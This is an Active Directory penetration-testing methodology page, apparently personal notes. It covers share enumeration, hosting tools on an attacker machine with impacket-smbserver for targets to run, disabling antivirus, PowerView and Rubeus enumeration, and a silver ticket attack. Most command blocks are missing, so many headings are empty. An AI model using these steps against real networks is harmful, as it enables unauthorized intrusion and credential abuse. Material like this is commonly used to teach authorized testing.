Methodology

This Page shows the Complete methodology for Active Directory Pentesting

Enumerating AD Environment

Listing Shares on Windows

## view the shares
net view \\Computername.abc.corp  

## List the Shares
dir \\computer-name.abc.corp     

Impacket-SmbServer to Host Files

We can use impacket-smbserver to host files as well and Run files from this share as well.

impacket-smbserver -smb2support -user test -password test share $(pwd)

### without password
impacket-smbserver -smb2support share $(pwd)    

then on Target windows machine, we need to connect to this share and run our tools.

net use \\IP_add_of_kali\share

Turn AV off

PowerView Enumerating Basic Stuff

Enumerate AD Users

Only Get-DomainUser command will print very Long info so you can use below command to filter just the usernames

Enumerating AD Computers

This command will get all of the computer names in the Domain.

Enumerating Domain Admins Group

Enumerating Domain Admins Group Members

Enumerating Enterprise Admins Group Members

PowerView Enumerating Advanced

Enumerating ACL's

Enumerating Organizational Unit (OU)

Tools and Commands

Powerup.ps1

To Invoke any abuse function with your own username you can use below command.

Bloodhound-python

We can use bloodhound to enumerate the domain if we have a valid set of credentials, we can use bloodhound.py kali linux script to do some enumeration

Rubeus Commands.

Runas Command

PS-Session and Cred Object

Silver Ticket Attack

In a silver ticket attack, the attacker can forge a valid TGS (Ticket granting Service) and then attacker can access that service using that TGS.

For this attack we need the NTLM hash of the service account user. for this we can use online tools, or below python code

For Domain SID we can use

now we have both NTLM hash and the Domain SID so we can craft the Silver Ticket Attack, for this i like to use Impacket-ticketer

this will create a administrator.ccache file

Last updated